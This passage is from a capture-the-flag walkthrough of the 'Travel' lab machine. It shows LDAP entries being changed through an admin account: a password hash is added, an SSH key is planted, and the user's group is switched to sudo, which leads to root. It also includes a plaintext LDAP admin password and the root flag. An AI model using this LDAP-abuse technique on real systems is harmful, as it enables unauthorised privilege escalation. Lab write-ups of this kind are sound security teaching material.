dn: uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
uid: gloria
uidNumber: 5010
homeDirectory: /home/gloria
givenName: Gloria
gidNumber: 5000
sn: Wood
cn: Gloria Wood
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
loginShell: /bin/bash

# search result
search: 2
result: 0 Success

# numResponses: 22
# numEntries: 21

So, we can find our lynik-admin account with which we can administer the directory. We also find a lot of users. Interesting are the posixAccount and shadowAccount classes that provide the loginShell, homeDirectory and gidNumber properties. This configuration implies we might be able to authenticate to this system using LDAP.

Because we are LDAP administrator, we can configure accounts so that they have more privileges on the local machine. Lynik-admin is no person account, so it looks like we SSHed to this machine using a local account. Therefore I’ll need to find a way to authenticate as another user. Let’s try to look up the gloria user.

getent passwd gloria
gloria:*:5010:5000:Gloria Wood:/home@TRAVEL/gloria:/bin/bash

Great! So, it looks like this machine is configured for LDAP authentication.

Gloria

Let’s take Gloria as to gain access.

# gloria, users, linux, servers, travel.htb
dn: uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
uid: gloria
uidNumber: 5010
homeDirectory: /home/gloria
givenName: Gloria
gidNumber: 5000
sn: Wood
cn: Gloria Wood
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: shadowAccount
loginShell: /bin/bash

To be able to authenticate to a system we need a password. authPassword is an optional property of the posixAccount object class. During the orientation I’ve found the ldapmodify tool. By reading it’s ‘man’ pages I came up with this command to add the password attribute to the user.

When inspecting lynik-admin I noticed it has abase64 encoded representation. It took me a while to find out that ldapsearch applies base64 on the password output and that the values are not actually encoded in the database. Therefore there is no need to encode it when inserting.

echo e1NTSEF9MEpaelF3blZJNEZrcXRUa3pRWUxVY3ZkN1NwRjFRYkRjVFJta3c9PQ== | base64 -d
{SSHA}0JZzQwnVI4FkqtTkzQYLUcvd7SpF1QbDcTRmkw==

The attribute is set with a schema and a value. Let’s just reuse that value.

cat addpass
dn: uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
add: authPassword
authPassword: {SSHA}0JZzQwnVI4FkqtTkzQYLUcvd7SpF1QbDcTRmkw==
lynik-admin@travel:~$ ldapmodify -x -w Theroadlesstraveled -f addpass
authPassword: attribute type undefined

For some reason, the attribute is not defined. I noticed the userPass attribute on lynik-admin. Let’s try that one.

lynik-admin@travel:~$ ldapmodify -x -w Theroadlesstraveled -f addpass
modifying entry "uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"

Great. Let’s test whether we can authenticate to LDAP.

lynik-admin@travel:~/.myrtle$ ldapwhoami -D uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb -x -w myrtle123
dn:uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb

That works. Let’s try to switch to gloria on the box itself.

lynik-admin@travel:~/.myrtle$ su -l gloria
Password: 
su: Permission denied

Looks like we cannot authenticate. Let’s try SSH:

ssh gloria@travel.htb
gloria@travel.htb: Permission denied (publickey).

So that failed as well. We need to take a better look at how LDAP authentication is configured on this machine.

SSSD

Lets grab a new copy of lse.sh and enumerate this machine.

./lse.sh -l2
[i] usr050 Groups for other users.......................................... yes!
---
sssd:x:118:

[i] usr060 Other users..................................................... yes!
---
sssd:x:113:118:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin

[*] fst000 Writable files outside user's home.............................. yes!
---
/var/lib/sss/pipes/pam
/var/lib/sss/pipes/nss
/var/lib/sss/pipes/ssh

[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/libexec/sssd/proxy_child
/usr/libexec/sssd/ldap_child
/usr/libexec/sssd/selinux_child
/usr/libexec/sssd/krb5_child
/usr/libexec/sssd/p11_child

This machine is running the System Security Services Daemon.

man sssd
NAME
       sssd - System Security Services Daemon
      
DESCRIPTION
       SSSD provides a set of daemons to manage access to remote directories and authentication mechanisms. It provides an NSS and PAM interface toward the system and a pluggable backend system to connect to multiple different account sources as well as D-Bus
       interface. It is also the basis to provide client auditing and policy services for projects like FreeIPA. It provides a more robust database to store local users as well as extended user data.

We have already confirmed nss is able to find the gloria user. Taking a look at its configuration file tells us it indeed uses sssd.

$ cat /etc/nsswitch.conf
passwd:		files systemd sss
group:		files systemd sss
shadow:		files sss
gshadow:	files

It is. Let’s find out whether PAM is configured to use SSSD.

cd /etc/pam.d
grep -R sss
$ grep -R sss
common-session:session  optional                        pam_sss.so 
common-password:password        sufficient                      pam_sss.so use_authtok
common-auth:auth        [success=1 default=ignore]      pam_sss.so use_first_pass
common-account:account  [default=bad success=ok user_unknown=ignore]    pam_sss.so 

So PAM looks to be configured to use SSSD as well. That is interesting, because by default sshd uses pam as well.

Let’s take a look at the sshd configuration.

/etc/ssh/sshd_config
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing.
usePAM yes

PasswordAuthentication no
Match User trvl-admin,lynik-admin
        PasswordAuthentication yes

We confirmed that sshd is configured to use PAM. We also learn password authentication is disabled except for the trvl-admin and lynik-admin users.

Let’s confirm that SSSD is configured to use LDAP.

$ cat /etc/sssd/sssd.conf 
cat: /etc/sssd/sssd.conf: Permission denied

Unfortunately we cannot see its configuration, however it is most likely true that SSSD is the bridge to the LDAP server.

SSH LDAP Authentication

So, if everything is configured correctly, then why can I not login using su -l? However, maybe I can authenticate using a ssh key.

I found a nice article by Kouhei Maeda about this subject. If this server implements this, they probably installed a similar schema. To test this, let’s add the object class ldapPublicKey and its attribute sshPublicKey to gloria.

dn: uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0/NWbIQLtlAcy33Rz9xOGywZ1VqiieLOf9nCrgOUbbZ6UusUQ+/kAtiD95krXxCyite7MAhCD41FtOZynUE0y+vGp0/vDg0gpXhVcrpWRr3JpK3eZMJYaEoYrYRlBkdaqrctV6fH/Fa7K/b+/5VJ1RtBWUGL4FGTKjH5Xh2pPvUXCHuheEHx6wgkFmcFGPGAgfgVXzak9ip+auvo3KlLWvJDmv1urdPGgtWS1C3opSf1ooT+fSz+ADfLhqXIuB6JXJXNXq7bdADS9JmUwRtG3Q7k5Yr+z8jxNKYC6cAanCTPLpG74ZxetMHur0eYCzrxTHyGrRuBsyRvxvpJPM/1G8d1LjnSSXF5DDkWLdMyLmV98pML0qIlCt911VSxzBoAijQRGey2k9YTgbzoLw+Lf0oAv31iQYZxtLrQ4FTUsovG1yM9IBvDxrOSQ1Ax6bzwDpWf/53bA9tgkSUoQC3ihXWj30W6P8Lj8LesMPn4xfxcyMKF/CARQyTSrYoMhQM8= foo

After running ldapmodify again, it reported no errors. Let’s try to authenticate using SSH

Bingo, we have shell!

ssh gloria@travel.htb
Creating directory '/home@TRAVEL/gloria'.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)

Let’s see who we are.

gloria@travel:~$ id
uid=5010(gloria) gid=5000(domainusers) groups=5000(domainusers)

Luckily our local uid and gid are set to the values configured in LDAP. That means that using the LDAP administrator account we can configure a user to have privileges available on this target machine.

At first, I tried to join the root group. Unfortunately that did not work. However, we can still gain root privileges if we a user is allowed to use sudo. Therefore, lets add our user to the sudo group.

gloria@travel:~$ cat /etc/group | grep sudo
sudo:x:27:trvl-admin
cat changegroup
dn: uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb
changetype: modify
replace: gidNumber
gidNumber: 27
lynik-admin@travel:~/.myrtle$ ldapmodify -x -w Theroadlesstraveled -f changegroup
modifying entry "uid=gloria,ou=users,ou=linux,ou=servers,dc=travel,dc=htb"

Let’s try to authenticate again and use sudo. A little note: A cleanup script resets the LDAP directory from time to time. You might need to repeat previous steps first.

gloria@travel:~$ sudo su
root@travel:/home@TRAVEL/gloria#

Let’s grab our root.txt. Congratulations, you have rooted this machine.

cat /root/root.txt
Li5yLmUuYS5sLmwueS4/LkwuTy5MLi5NLnkucnRsZS4=

Retrospective

So, let’s figure out why I could not authenticate gloria with a password. Now that we are root, Let’s take a look at sssd.conf first.

cat /etc/sssd/sssd.conf
[nss]
filter_users = root
filter_groups = root

[pam]

[domain/TRAVEL]
use_fully_qualified_names = False
override_homedir = /home@TRAVEL/%u
id_provider = ldap
auth_provider = ldap
(..)
ldap_user_search_base = ou=users,ou=linux,ou=servers,dc=travel,dc=htb

First, I found the reason why joining the root group did not work. Here we confirm sssd is indeed configured to use ldap.

Let’s take a look at su -l. I suspected it was the PAM configuration. I decided to ask one of the admins jkr for some answers. He mentioned to take a look at wheel in the su configuration.

cat /etc/pam.d/su

# Uncomment this to force users to be a member of group root
# before they can use `su'. 
auth       required   pam_wheel.so